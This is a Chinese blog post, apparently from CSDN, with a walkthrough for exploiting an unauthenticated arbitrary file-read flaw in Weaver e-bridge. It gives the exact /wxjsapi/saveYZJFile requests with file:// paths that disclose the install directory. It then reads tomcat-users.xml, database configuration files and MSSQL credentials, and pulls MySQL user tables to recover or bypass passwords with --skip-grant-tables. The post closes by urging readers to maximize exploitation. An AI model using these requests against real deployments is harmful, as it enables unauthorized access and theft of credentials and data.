配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)

本文介绍了泛微ebridge系统中存在未授权的任意文件读取漏洞,通过接口可以获取程序绝对路径,进而读取敏感文件,如数据库配置、密码文件等。在Linux和Windows环境下,利用方法有所不同,展示了如何利用此漏洞获取tomcat配置、数据库凭证,并在Linux环境中重置MySQL密码。文章强调了渗透测试中发散思维的重要性。
摘要由CSDN通过智能技术生成

bff96b7084581ed613ee162459353d26.png

漏洞简介

         未授权任意文件读取,/wxjsapi/saveYZJFile接口获取filepath,输入文件路径->读取文件内容。返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件。

         目录遍历+文件读取,我们能做的事情就很多了,比如读取管理员在桌面留下的密码文件、数据库配置文件、nginx代理配置、访问日志等。

漏洞利用

Linux

先获取e-bridge的安装路径

# path/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///&fileExt=txt

842cf00fe03f898af37c390c174bfb49.png

# path/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ewechat/&fileExt=txt

2be78486be19434617fb1bc947937d97.png

找到了当前目录,现在即可组合文件读取进行漏洞利用最大化。

tomcat-users.xml (tomcat配置文件)

# path/usr/ewechat/tomcat/conf/tomcat-users.xml

bbed4ef5389c6b7e93b0c146590a1603.png

init.properties (数据库配置文件)

# path/usr/ewechat/tomcat/webapps/ROOT/WEB-INF/classes/init.properties

bb77c41a0b2f5ef9496eb86f3baa5a70.png

sqlserverconfig.properties (mssql用户名密码)

# path/usr/ewechat/tomcat/webapps/ROOT/WEB-INF/classes/sqlserverconfig.properties

c5192fea37d1da2c57f19e3f5c683080.png

user.MYD (mysql)

# path/usr/ewechat/mysql/data/mysql/user.MYD

484088e4db1da46b2ee2a51da2089c08.png

下载mysql的user.MYD文件

记事本打开可以直接查看到密码的MD5值9f9b44dd94da1104cedfca99b6bacbdf.png

user.frm user.MYD user.MYI (mysql)

# path/usr/ewechat/mysql/data/mysql/user.MYD/usr/ewechat/mysql/data/mysql/user.MYI/usr/ewechat/mysql/data/mysql/user.frm
  • 自行搭建环境

  • 下载user.frm user.MYD user.MYI这三个文件到本地替换

  • 输入mysqld --skip-grant-tables 回车。--skip-grant-tables 的意思是启动MySQL服务的时候跳过权限表认证。

  • 连接数据库查询

Windows

先获取e-bridge的安装路径f7522182a34c6029d80729588c69a584.png

init.properties (数据库配置文件)

# pathd://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.properties

c9d9b201b83b740563232f2e7a324329.png

e-bridge的相对路径是一样的,所以在win环境下,可根据以上Linux环境下的路径直接构造想要读取的文件路径:

# pathd:/ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.propertiesd:/ebridge/tomcat/conf/tomcat-users.xmld:/ebridge/tomcat/webapps/ROOT/WEB-INF/classes/sqlserverconfig.propertiesd:/ebridge/mysql/data/mysql/user.MYD...

### 分割线

这篇文章只是一种渗透思路的体现,不管是xss还是rce,其漏洞带来的影响都需要去被发散思维/最大化利用,以便将战果尽可能地扩大c6ee1d61f4072315c6ff92090e51db7a.png

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值